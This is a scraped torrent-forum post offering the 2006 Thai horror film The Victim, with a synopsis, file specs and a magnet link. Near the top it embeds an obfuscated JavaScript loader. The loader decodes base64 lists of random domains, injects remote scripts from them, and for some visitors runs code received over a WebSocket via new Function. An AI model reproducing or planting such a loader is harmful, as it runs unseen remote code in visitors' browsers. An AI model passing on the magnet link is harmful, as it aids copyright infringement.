吓死鬼[中文字幕].The.Victim.2006.1080p.迅雷下载 7.17GB

版主小s 28天前 223

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 吓死鬼 / 凶案还魂 / The Victim / Phii khon pen / Spirit of the Victim

◎片 名 The.Victim

◎年 代 2006

◎产 地 泰国

◎类 别 悬疑 / 惊悚 / 恐怖

◎语 言 泰语

◎上映日期 2006-10-12

◎IMDb链接 https://www.imdb.com/title/tt0889212/

◎豆瓣评分 6.9/10 (14445人评价)

◎豆瓣链接 https://movie.douban.com/subject/2030563/

◎片 长 108 分钟

◎导 演 蒙松 Monthon Arayangkoon (id:1325263)

◎编 剧 蒙松 Monthon Arayangkoon (id:1325263)

◎演 员 皮佳娜·莎卡功 Pitchanart Sakakorn (id:1326926)

彭帕克·西里古尔 Penpak Sirikul (id:1335429)

◎标 签 恐怖 / 泰国 / 惊悚 / 泰国电影 / 恐怖片 / 灵异 / 泰国鬼片 / 吓死鬼

◎简 介

本片是一出剧中剧:相貌平平的婷(PitchanartSakakorn饰)渴望成为万人瞩目的大明星,为此她在表演进修班刻苦学习。某个夜晚,她受警方邀请成为一名还原凶案过程的演示者。虽然这份工作实在有点阴森奇怪,不过婷却离她的明星梦越来越近。在这一过程中,婷的身边也开始出现诡异现象。某天,泰国选美佳丽敏(ApasiriNitibhon饰)遭人杀害,婷意识到这是一个令自己一跃成名的良机,她仔细研究敏的生平和案情,准备全心演好这个角色,不过却因此经历了更多离奇的事件,婷开始更为深入地探究敏被害的秘密。

饰演婷的女孩梅在这部恐怖片拍摄过程中也经历了许多怪事,她甚至在现场神秘晕倒。似乎虚幻总与现实相关联,围绕这出根据真实事件改编的恐怖片,更多怪事层出不穷……

  1. General

  2. Unique ID : 259592247039339507754741213622837634880 (0xC34BA5EFCE11BD283BA17F271A52E740)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.16 GiB

  7. Duration : 1 h 43 min

  8. Overall bit rate : 9 915 kb/s

  9. Encoded date : UTC 2021-06-26 11:36:12

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 43 min

  22. Bit rate : 9 595 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 25.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Interlaced

  32. Scan type, store method : Separated fields

  33. Scan order : Top Field First

  34. Bits/(Pixel*Frame) : 0.185

  35. Stream size : 6.93 GiB (97%)

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : AAC LC

  45. Format/Info : Advanced Audio Codec Low Complexity

  46. Codec ID : A_AAC-2

  47. Duration : 1 h 43 min

  48. Bit rate : 317 kb/s

  49. Channel(s) : 2 channels

  50. Channel layout : L R

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 46.875 FPS (1024 SPF)

  53. Compression mode : Lossy

  54. Stream size : 235 MiB (3%)

  55. Language : Thai

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 1 h 40 min

  64. Bit rate : 21 b/s

  65. Count of elements : 763

  66. Stream size : 15.8 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 1 h 40 min

  77. Bit rate : 21 b/s

  78. Count of elements : 763

  79. Stream size : 15.8 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : No

  83. Forced : No


TAGS 惊悚 恐怖 悬疑 /

磁力链:
  • magnet:?xt=urn:btih:8A91343CBBC6ADD1A2439B7ED25D7113785CBA21
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回